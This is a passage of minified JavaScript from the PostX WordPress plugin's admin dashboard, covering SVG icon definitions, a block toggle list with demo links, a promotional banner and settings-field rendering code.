2.5Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M18.5 11L19 17L15 21L13.5 16",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M8 10.5L3 9L7 5L13 5.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M9 15L3.5 20.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M11.5 17.5L9 20",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.5 12.5L4 15",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17.4902 6.5H17.5002",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),gallery_indicator_image_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3 5C3 3.89543 3.89543 3 5 3H19C20.1046 3 21 3.89543 21 5V13C21 14.1046 20.1046 15 19 15H5C3.89543 15 3 14.1046 3 13V5Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M21.0002 12.6716L19.4144 11.0858C18.6333 10.3047 17.367 10.3047 16.5859 11.0858L15.9144 11.7574C15.1333 12.5384 13.867 12.5384 13.0859 11.7574L10.4144 9.08579C9.63332 8.30474 8.36699 8.30474 7.58594 9.08579L3.33594 13.3358",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M16.25 7C16.25 7.82843 15.5784 8.5 14.75 8.5C13.9216 8.5 13.25 7.82843 13.25 7C13.25 6.17157 13.9216 5.5 14.75 5.5C15.5784 5.5 16.25 6.17157 16.25 7Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M3 18.5C3 17.9477 3.44772 17.5 4 17.5H6.25C6.80228 17.5 7.25 17.9477 7.25 18.5V20C7.25 20.5523 6.80228 21 6.25 21H4C3.44772 21 3 20.5523 3 20V18.5Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M10 18.5C10 17.9477 10.4477 17.5 11 17.5H13.25C13.8023 17.5 14.25 17.9477 14.25 18.5V20C14.25 20.5523 13.8023 21 13.25 21H11C10.4477 21 10 20.5523 10 20V18.5Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M17 18.5C17 17.9477 17.4477 17.5 18 17.5H20C20.5523 17.5 21 17.9477 21 18.5V20C21 20.5523 20.5523 21 20 21H18C17.4477 21 17 20.5523 17 20V18.5Z",stroke:"currentColor",strokeWidth:"1.5"})),unlocked_open_security_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4 12C4 10.8954 4.89543 10 6 10H18C19.1046 10 20 10.8954 20 12V20C20 21.1046 19.1046 22 18 22H6C4.89543 22 4 21.1046 4 20V12Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17 10V7C17 4.23858 14.7615 2 12 2C10.1493 2 8.53347 3.0055 7.66895 4.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12 15.5L12 16.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),unlink_link_break_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M14.0113 17.0281L11.4972 19.5421C9.55336 21.486 6.40175 21.486 4.45789 19.5421C2.51404 17.5983 2.51404 14.4467 4.45789 12.5028L6.97193 9.98877M9.98875 6.97192L12.5028 4.45789C14.4466 2.51404 17.5983 2.51404 19.5421 4.45789C21.486 6.40174 21.486 9.55334 19.5421 11.4972L17.0281 14.0112",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M9.5 14.5L14.5 9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M3 5L19 21",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),plus_circle_zoom_in_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12 7V12.0001M12 12.0001V17M12 12.0001H17M12 12.0001H7",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),sort_descending_order_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4 18.5H17",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4 6.5H9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4 12.5H11.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17 14.5V5.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M13 9.5L17 5.5L21 9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),sort_ascending_order_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4 5.5H17",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4 17.5H9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4 11.5H11.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17 9.5V18.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M13 14.5L17 18.5L21 14.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),right_circle_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M22 12C22 17.5228 17.5228 22 12 22C6.47715 22 2 17.5228 2 12C2 6.47715 6.47715 2 12 2C17.5228 2 22 6.47715 22 12Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M8 12.5L10.5 15L16 9",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),plus:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,a.createElement)("path",{d:"M12 19.8c-.4 0-.8-.3-.8-.8v-6.2H5c-.4 0-.8-.3-.8-.8s.3-.8.8-.8h6.2V5c0-.4.3-.8.8-.8s.8.3.8.8v6.2H19c.4 0 .8.3.8.8s-.3.8-.8.8h-6.2V19c0 .4-.4.8-.8.8z"})),subtract:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M5 12H19",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}))}},5404:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294);const r={};r.moon=(0,a.createElement)("svg",{viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg",fill:"currentColor"},(0,a.createElement)("path",{d:"M22 14.27A10.14 10.14 0 1 1 9.73 2 8.84 8.84 0 0 0 22 14.27Z"})),r.moon_line=(0,a.createElement)("svg",{viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M8.17 4.53A9.54 9.54 0 0 0 19.5 15.69a8.26 8.26 0 0 1-7.76 4.29 8.36 8.36 0 0 1-7.71-7.7 8.23 8.23 0 0 1 4.15-7.76m1-2.52c-.16 0-.32.03-.48.09a10.28 10.28 0 0 0 3.56 19.9c4.47 0 8.27-2.85 9.67-6.84a1.36 1.36 0 0 0-1.27-1.82c-.15 0-.31.03-.47.1a7.48 7.48 0 0 1-3.41.43 7.59 7.59 0 0 1-6.33-10.04A1.36 1.36 0 0 0 9.17 2Z"})),r.sun=(0,a.createElement)("svg",{viewBox:"0 0 24 24"},(0,a.createElement)("g",null,(0,a.createElement)("path",{d:"M12 18.36a6.36 6.36 0 1 0 0-12.72 6.36 6.36 0 0 0 0 12.72ZM12.98.96V2.8c0 .53-.43.95-.97.95h-.02a.96.96 0 0 1-.97-.95V.96c0-.53.43-.96.96-.96h.05c.53 0 .96.43.96.96ZM4.89 3.5l1.3 1.3c.38.38.37.98 0 1.36h-.01l-.01.02a.96.96 0 0 1-1.37 0l-1.3-1.3a.96.96 0 0 1 0-1.35l.04-.04a.96.96 0 0 1 1.35 0ZM.96 11.02H2.8c.53 0 .95.43.95.97v.02c0 .53-.42.97-.95.97H.96a.95.95 0 0 1-.96-.96v-.05c0-.53.43-.96.96-.96ZM3.5 19.11l1.3-1.3a.96.96 0 0 1 1.36 0v.01l.02.01c.38.38.39.99 0 1.37l-1.3 1.3a.96.96 0 0 1-1.35 0l-.04-.04a.96.96 0 0 1 0-1.35ZM11.02 23.04V21.2c0-.53.43-.95.97-.95h.02c.53 0 .97.42.97.95v1.84c0 .53-.43.96-.96.96h-.05a.95.95 0 0 1-.96-.96ZM19.11 20.5l-1.3-1.3a.96.96 0 0 1 0-1.36h.01l.01-.02a.96.96 0 0 1 1.37 0l1.3 1.3c.38.37.38.98 0 1.35l-.04.04a.96.96 0 0 1-1.35 0ZM23.04 12.98H21.2a.96.96 0 0 1-.95-.97v-.02c0-.53.42-.97.95-.97h1.84c.53 0 .96.43.96.96v.05c0 .53-.43.96-.96.96ZM20.5 4.89l-1.3 1.3a.96.96 0 0 1-1.36 0v-.01l-.02-.01a.96.96 0 0 1 0-1.37l1.3-1.3a.96.96 0 0 1 1.35 0l.04.04c.37.37.37.98 0 1.35Z"})),(0,a.createElement)("defs",null)),r.sun_line=(0,a.createElement)("svg",{viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M12 7.64a4.36 4.36 0 1 1-.01 8.73A4.36 4.36 0 0 1 12 7.64Zm0-2a6.35 6.35 0 1 0 0 12.71 6.35 6.35 0 0 0 0-12.7ZM12.98.96V2.8c0 .53-.43.96-.96.96h-.03a.96.96 0 0 1-.97-.96V.96c0-.53.43-.96.96-.96h.06c.52 0 .95.43.95.96ZM4.88 3.5l1.3 1.3c.38.38.38.98 0 1.36h-.01l-.01.02a.96.96 0 0 1-1.36.01L3.5 4.9a.96.96 0 0 1 0-1.35l.03-.04a.96.96 0 0 1 1.35 0ZM.96 11.02H2.8c.53 0 .96.43.96.96v.03c0 .53-.42.97-.96.97H.96a.96.96 0 0 1-.96-.96v-.06c0-.52.43-.95.96-.95ZM3.5 19.12l1.3-1.3a.96.96 0 0 1 1.38.02c.38.38.39.99.01 1.36l-1.3 1.3a.96.96 0 0 1-1.35 0l-.04-.03a.96.96 0 0 1 0-1.35ZM11.02 23.04V21.2c0-.53.43-.96.96-.96h.03c.53 0 .97.42.97.96v1.84c0 .53-.43.96-.96.96h-.06a.96.96 0 0 1-.95-.96ZM19.12 20.5l-1.3-1.3a.96.96 0 0 1 0-1.36h.01l.01-.02a.96.96 0 0 1 1.36-.01l1.3 1.3c.38.37.38.98 0 1.35l-.03.04a.96.96 0 0 1-1.35 0ZM23.04 12.98H21.2a.96.96 0 0 1-.96-.96v-.03c0-.53.42-.97.96-.97h1.84c.53 0 .96.43.96.96v.06c0 .52-.43.95-.96.95ZM20.5 4.88l-1.3 1.3a.96.96 0 0 1-1.36 0v-.01l-.02-.01a.96.96 0 0 1-.01-1.36l1.3-1.3a.96.96 0 0 1 1.35 0l.04.03c.38.37.38.98 0 1.35Z"}));const o=r},3644:(e,t,n)=>{"use strict";n.d(t,{Z:()=>d});var a=n(7294),r=n(2304),o=n(1383),i=n(3100),l=n(4766),s=n(8949),p=n(356);const c=()=>{const[e,t]=(0,a.useState)({}),[n,i]=(0,a.useState)(!0),[l,c]=(0,a.useState)({status:"",messages:[],state:!1}),d={post_list_1:{label:(0,r.__)("Post List #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6836",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-1/",icon:"post-list-1.svg"},post_slider_2:{label:(0,r.__)("Post Slider #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7487",docs:"https://wpxpo.com/docs/postx/all-blocks/post-slider-2/",icon:"post-slider-2.svg"},post_list_4:{label:(0,r.__)("Post List #4","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6839",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-4/",icon:"post-list-4.svg"},post_slider_1:{label:(0,r.__)("Post Slider #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6840",docs:"https://wpxpo.com/docs/postx/all-blocks/post-slider-1/",icon:"post-slider-1.svg"},post_grid_4:{label:(0,r.__)("Post Grid #4","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6832",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-4/",icon:"post-grid-4.svg"},post_module_1:{label:(0,r.__)("Post Module #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6825",docs:"https://wpxpo.com/docs/postx/all-blocks/post-module-1/",icon:"post-module-1.svg"},post_grid_2:{label:(0,r.__)("Post Grid #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6830",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-2/",icon:"post-grid-2.svg"},advanced_search:{label:(0,r.__)("Search - PostX","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8233",docs:"https://wpxpo.com/docs/postx/all-blocks/search-block",icon:"advanced-search.svg"},button_group:{label:(0,r.__)("Button Group","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7952",docs:"https://wpxpo.com/docs/postx/all-blocks/button-block/",icon:"button-group.svg"}},u=(0,o.t)();(0,a.useEffect)((()=>{m()}),[]);const m=()=>{wp.apiFetch({path:"/ultp/v2/get_all_settings",method:"POST",data:{key:"key",value:"value"}}).then((e=>{e.success&&u.current&&(t(e.settings),i(!1))}))};return(0,a.createElement)(a.Fragment,null,l.state&&(0,a.createElement)(p.Z,{delay:2e3,toastMessages:l,setToastMessages:c}),Object.keys(d).map(((o,i)=>{const l=d[o];let p=!!l.default;return""==e[o]&&(p="yes"==e[o]),(0,a.createElement)("div",{key:o},n?(0,a.createElement)("div",{className:"ultp-dash-blocks-item ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-blocks-item-meta"},(0,a.createElement)(s.Z,{type:"custom_size",c_s:{size1:24,unit1:"px",size2:24,unit2:"px",br:4}}),(0,a.createElement)(s.Z,{type:"custom_size",c_s:{size1:70,unit1:"px",size2:24,unit2:"px",br:4}})),(0,a.createElement)("div",{className:"ultp-blocks-control-option ultp-dash-control-options"},(0,a.createElement)(s.Z,{type:"custom_size",c_s:{size1:30,unit1:"px",size2:20,unit2:"px",br:4}}),(0,a.createElement)(s.Z,{type:"custom_size",c_s:{size1:40,unit1:"px",size2:20,unit2:"px",br:20}}))):(0,a.createElement)("div",{className:"ultp-dash-blocks-item ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-blocks-item-meta"},(0,a.createElement)("img",{className:"ultp-blocks-item-icon",src:`${ultp_dashboard_pannel.url}assets/img/blocks/${l.icon}`,alt:l.label}),(0,a.createElement)("div",{className:"ultp-blocks-item-title"},l.label)),(0,a.createElement)("div",{className:"ultp-blocks-control-option ultp-dash-control-options"},l.live&&(0,a.createElement)("a",{href:l.live,className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},(0,r.__)("Demo","ultimate-post")),(0,a.createElement)("input",{type:"checkbox",className:"ultp-blocks-enable",id:o,checked:p,onChange:()=>{(n=>{const a=e?.hasOwnProperty(n)&&"yes"!=e[n]?"yes":"";t({...e,[n]:a}),wp.apiFetch({path:"/ultp/v2/addon_block_action",method:"POST",data:{key:n,value:a}}).then((e=>{e.success&&c({status:"success",messages:[e.message],state:!0})}))})(o)}}),(0,a.createElement)("label",{className:"ultp-control__label",htmlFor:o}))))})))},d=()=>{const e=[{label:(0,r.__)("50+ Custom Layouts","ultimate-post")},{label:(0,r.__)("250+ Pattern","ultimate-post")},{label:(0,r.__)("45+ Custom Post Blocks","ultimate-post")},{label:(0,r.__)("Pin-point Customization","ultimate-post")},{label:(0,r.__)("Dynamic Site Building","ultimate-post")},{label:(0,r.__)("Limitless Flexibility","ultimate-post")}],[t,n]=(0,a.useState)(!1);return(0,a.createElement)("div",{className:"ultp-dashboard-container-grid"},(0,a.createElement)("div",{className:"ultp-dashboard-content"},(0,a.createElement)("div",{className:"ultp-dash-banner ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-dash-banner-left"},(0,a.createElement)("div",{className:"ultp-dash-banner-title"},"Create Engaging Sites in Minutes…"),(0,a.createElement)("div",{className:"ultp-dash-banner-description"},"Thrilled to improve your WordPress blog? PostX supports you in creating and customizing stunning blogs! Design smooth, powerful websites - no compromises, unlimited options."),(0,a.createElement)("a",{className:"ultp-primary-alter-button",onClick:e=>{e.preventDefault(),window.location.replace("#startersites")}},(0,r.__)("Build with Starter Sites","ultimate-post"))),(0,a.createElement)("div",{className:"ultp-dash-banner-right"},t?(0,a.createElement)("iframe",{className:"ultp-dash-banner-right-video",src:"https://www.youtube.com/embed/FYgSe7kgb6M?autoplay=1",allow:"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; fullscreen",title:"Ultimate Post"}):(0,a.createElement)("div",{className:"ultp-dash-banner-right-img"},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/dashboard/dashboard_banner_right.png",alt:(0,r.__)("Ultimate Post","ultimate-post")}),(0,a.createElement)("div",{className:"ultp-dash-banner-right-play-button",onClick:()=>{n(!0)}},l.ZP.rightFillAngle)))),(0,a.createElement)("div",{className:"ultp-dash-blocks ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-dash-blocks-heading"},(0,a.createElement)("div",{className:"ultp-dash-blocks-heading-title"},(0,r.__)("Blocks","ultimate-post")),(0,a.createElement)("a",{onClick:e=>{e.preventDefault(),window.location.replace("#blocks")},className:"ultp-transparent-button"},(0,r.__)("View All","ultimate-post"),l.ZP.angle_top_right_line)),(0,a.createElement)("div",{className:"ultp-dash-blocks-items"},(0,a.createElement)(c,null))),!ultp_dashboard_pannel?.active&&(0,a.createElement)("div",{className:"ultp-dash-pro-promo ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left"},(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left-title"},(0,r.__)("Go Pro & Unlock More! 🚀","ultimate-post")),(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left-description"},(0,r.__)("Harness the true power of PostX: build, customize, and launch dynamic WordPress sites with unrestricted creative control - no code, no hassle.","ultimate-post")),(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left-keyfeature"},e.map(((e,t)=>(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left-keyfeature-item",key:e.label},l.ZP.right_circle_solid,e.label)))),(0,a.createElement)("a",{href:(0,i.Z)("https://www.wpxpo.com/postx/?utm_source=db-postx-topbar&utm_medium=upgrade-pro-sidebar&utm_campaign=postx-dashboard#pricing"),target:"_blank",rel:"noreferrer",className:"ultp-primary-alter-button"},l.ZP.rocket,"Upgrade to Pro")),(0,a.createElement)("img",{className:"ultp-dash-pro-promo-right-img",src:ultp_dashboard_pannel.url+"assets/img/dashboard/dashboard_pro_promo.png",alt:"Ultimate Post"}))),(0,a.createElement)("div",{className:"ultp-sidebar-features"},(0,a.createElement)("div",{className:"ultp-sidebar-card-item ultp-sidebar-starter-sites"},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/dashboard/sidebar-starter-sites.png",alt:"Starter Sites Make it Easy"}),(0,a.createElement)("div",{className:"ultp-sidebar-card-title"},"Starter Sites Make it Easy"),(0,a.createElement)("span",{className:"ultp-sidebar-card-description"},"Create awesome-looking webpages without any code with PostX starter sites - simply import the starter template of your choice. Drag, drop, and deploy your site in minutes."),(0,a.createElement)("div",{className:"ultp-sidebar-card-buttons"},(0,a.createElement)("a",{href:"https://www.wpxpo.com/postx/starter-sites/?utm_source=db-postx-started&utm_medium=starter-sites&utm_campaign=postx-dashboard&pux_link=dbstartersite",className:"ultp-primary-button",target:"_blank",rel:"noreferrer"},l.ZP.angle_top_right_line,"Explore Starter Templates"))),(0,a.createElement)("div",{className:"ultp-sidebar-card-item ultp-sidebar-community"},(0,a.createElement)("div",{className:"ultp-sidebar-card-title"},"PostX Community"),(0,a.createElement)("span",{className:"ultp-sidebar-card-description"},"Join the Facebook community of PostX to stay up-to-date and share your thoughts and feedback."),(0,a.createElement)("div",{className:"ultp-sidebar-card-buttons"},(0,a.createElement)("a",{href:"https://www.facebook.com/groups/gutenbergpostx",className:"ultp-primary-button",target:"_blank",rel:"noreferrer"},l.ZP.facebook,"Join PostX Community")))))}},4482:(e,t,n)=>{"use strict";n.d(t,{DC:()=>p,WO:()=>m,ac:()=>u,cs:()=>d,gR:()=>f,hx:()=>c,u4:()=>l});var a=n(7294),r=n(4766),o=n(3100),i=n(4190);n(3479);const{__}=wp.i18n,l={preloader_style:{type:"select",label:__("Preloader Style","ultimate-post"),options:{style1:__("Preloader Style 1","ultimate-post"),style2:__("Preloader Style 2","ultimate-post")},default:"style1",desc:__("Select Preloader Style.","ultimate-post"),tooltip:__("PostX has two preloader variations that display while loading PostX's blocks if you enable the preloader for that blocks.","ultimate-post")},container_width:{type:"number",label:__("Container Width","ultimate-post"),default:"1140",desc:__("Change Container Width of the Page Template(PostX Template).","ultimate-post"),tooltip:__("Here you can increase or decrease the container width. It will be applicable when you create any dynamic template with the PostX Builder or select PostX's Template while creating a page.","ultimate-post")},hide_import_btn:{type:"switch",label:__("Hide Template Kits Button","ultimate-post"),default:"",desc:__("Hide Template Kits Button from toolbar of the Gutenberg Editor.","ultimate-post"),tooltip:__("Click on the check box to hide the Template Kits button from posts, pages, and the Builder of PostX.","ultimate-post")},disable_image_size:{type:"switch",label:__("Disable Image Size","ultimate-post"),default:"",desc:__("Disable Image Size of the Plugins.","ultimate-post"),tooltip:__("Click on the check box to turn off the PostX's size of the post images.","ultimate-post")},disable_view_cookies:{type:"switch",label:__("Disable All Cookies","ultimate-post"),default:"",desc:__("Disable All Frontend Cookies (Cookies Used for Post View Count).","ultimate-post"),tooltip:__("Click on the check box to restrict PostX from collecting cookies. PostX contains cookies to display the post view count.","ultimate-post")},disable_google_font:{type:"switchButton",label:__("Disable All Google Fonts","ultimate-post"),default:"",desc:__("Disable All Google Fonts From Frontend and Backend PostX Blocks.","ultimate-post"),tooltip:__("Click the check box to disable all Google Fonts from PostX's typography options.","ultimate-post")}},s=({multikey:e,value:t,multiValue:n})=>{var o;const[i,l]=(0,a.useState)([...n]),[s,p]=(0,a.useState)(!1),[c,d]=(0,a.useState)(null!==(o=t.options)&&void 0!==o?o:{}),[u,m]=(0,a.useState)(""),f=e=>{e.target.closest(".ultp-ms-container")||p(!1)};return(0,a.useEffect)((()=>(document.addEventListener("mousedown",f),()=>document.removeEventListener("mousedown",f))),[]),(0,a.useEffect)((()=>{setTimeout((()=>{const e=Object.fromEntries(Object.entries(t.options).filter((([e,t])=>t.toLowerCase().includes(u.toLowerCase())||e.toLowerCase().includes(u.toLowerCase()))));d(e)}),500)}),[u]),(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("input",{type:"hidden",name:e,value:i,"data-customprop":"custom_multiselect"}),(0,a.createElement)("div",{className:"ultp-ms-container"},(0,a.createElement)("div",{onClick:()=>p(!s),className:"ultp-ms-results-con cursor"},(0,a.createElement)("div",{className:"ultp-ms-results"},i.length>0?i?.map(((e,n)=>(0,a.createElement)("span",{key:n,className:"ultp-ms-selected"},t.options[e],(0,a.createElement)("span",{className:"ultp-ms-remove cursor",onClick:t=>{var n;t.stopPropagation(),n=e,l(i.filter((e=>e!=n)))}},r.ZP.close_circle_line)))):(0,a.createElement)("span",null,__("Select options"))),(0,a.createElement)("span",{onClick:()=>p(!s),className:"ultp-ms-results-collapse cursor"},r.ZP.collapse_bottom_line)),s&&c&&(0,a.createElement)("div",{className:"ultp-ms-options"},(0,a.createElement)("input",{type:"text",className:"ultp-multiselect-search",value:u,onChange:e=>m(e.target.value)}),Object.keys(c)?.map(((e,n)=>(0,a.createElement)("span",{className:"ultp-ms-option cursor",onClick:()=>(e=>{if(-1==i.indexOf(e)&&"all"!=e&&l([...i,e]),"all"===e){const e=Object.fromEntries(Object.entries(t.options).filter((([e,t])=>!t.toLowerCase().includes("all"))));l(Object.keys(e))}})(e),key:n,value:e},c[e]))))))},p=(e,t)=>(0,a.createElement)(a.Fragment,null,Object.keys(e).map(((n,r)=>{const o=e[n];return(0,a.createElement)("span",{key:r},"hidden"==o.type&&(0,a.createElement)("input",{key:n,type:"hidden",name:n,defaultValue:o.value}),"hidden"!=o.type&&(0,a.createElement)(a.Fragment,null,"heading"==o.type&&(0,a.createElement)("div",{className:"ultp_h2 ultp-settings-heading"},o.label)&&(0,a.createElement)(a.Fragment,null,o.desc&&(0,a.createElement)("div",{className:"ultp-settings-subheading"},o.desc)),"heading"!=o.type&&(0,a.createElement)("div",{className:"ultp-settings-wrap"},o.label&&(0,a.createElement)("strong",null,o.label,o.tooltip&&(0,a.createElement)(i.Z,{content:o.tooltip},(0,a.createElement)("span",{className:" cursor dashicons dashicons-editor-help"}))),(0,a.createElement)("div",{className:"ultp-settings-field-wrap"},((e,t,n)=>{const r=n.hasOwnProperty(e)?n[e]:t.default?t.default:"multiselect"==t.type?[]:"";switch(t.type){case"select":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("select",{defaultValue:r,name:e,id:e},Object.keys(t.options).map(((e,n)=>(0,a.createElement)("option",{key:n,value:e},t.options[e])))),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"radio":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("div",{className:"ultp-field-radio"},(0,a.createElement)("div",{className:"ultp-field-radio-items"},Object.keys(t.options).map(((n,o)=>(0,a.createElement)("div",{key:o,className:"ultp-field-radio-item"},(0,a.createElement)("input",{type:"radio",id:n,name:e,value:n,defaultChecked:n===r}),(0,a.createElement)("label",{htmlFor:n},t.options[n])))))),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"color":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("input",{type:"text",defaultValue:r,className:"ultp-color-picker"}),(0,a.createElement)("span",{className:"ultp-settings-input-field"},(0,a.createElement)("input",{type:"text",name:e,className:"ultp-color-code",defaultValue:r})),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"number":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("input",{type:"number",name:e,defaultValue:r}),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"switch":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-field-inline"},(0,a.createElement)("input",{value:"yes",type:"checkbox",name:e,defaultChecked:"yes"==r||"on"==r}),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"switchButton":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-field-inline"},(0,a.createElement)("input",{type:"checkbox",value:"yes",name:e,defaultChecked:"yes"==r||"on"==r}),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc),(0,a.createElement)("div",null,(0,a.createElement)("span",{id:"postx-regenerate-css",className:`ultp-upgrade-pro-btn cursor ${"yes"==r?"active":""} `},(0,a.createElement)("span",{className:"dashicons dashicons-admin-generic"}),(0,a.createElement)("span",{className:"ultp-text"},__("Re-Generate Font Files","ultimate-post")))));case"multiselect":const n=Array.isArray(r)?r:[r];return(0,a.createElement)(s,{multikey:e,value:t,multiValue:n});case"text":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("input",{type:"text",name:e,defaultValue:r}),(0,a.createElement)("span",{className:"ultp-description"},t.desc,t.link&&(0,a.createElement)("a",{className:"settingsLink",target:"_blank",href:t.link,rel:"noreferrer"},t.linkText)));case"textarea":return(0,a.createElement)("div",{className:"ultp-settings-field 